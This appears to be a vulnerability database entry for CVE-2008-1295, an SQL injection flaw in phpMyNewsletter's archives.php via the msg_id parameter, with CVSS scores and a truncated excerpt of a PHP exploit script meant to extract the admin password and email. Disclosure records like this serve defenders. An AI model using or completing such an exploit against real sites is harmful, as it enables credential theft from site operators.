6.8
CVSSv2

CVE-2008-1295

Published: 12/03/2008 Updated: 29/09/2017
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in archives.php in Gregory Kokanosky (aka Greg's Place) phpMyNewsletter 0.8 beta 5 and previous versions allows remote malicious users to execute arbitrary SQL commands via the msg_id parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

gregory kokanosky phpmynewsletter

Exploits

#!/usr/bin/php <?php /* * Name: PHPMyNewsletter <= 08b5 SQL Injection * Credits: Charles "real" F <charlesfol[at]hotmailfr> * Date: 03-10-08 * Conditions: magic_quotes_gpc=Off * * This exploit gets admin_pass and admin_email from pmnl_config */ print "\n"; print " PHPMyNewsletter <= 08b5 SQL Injection\n"; print ...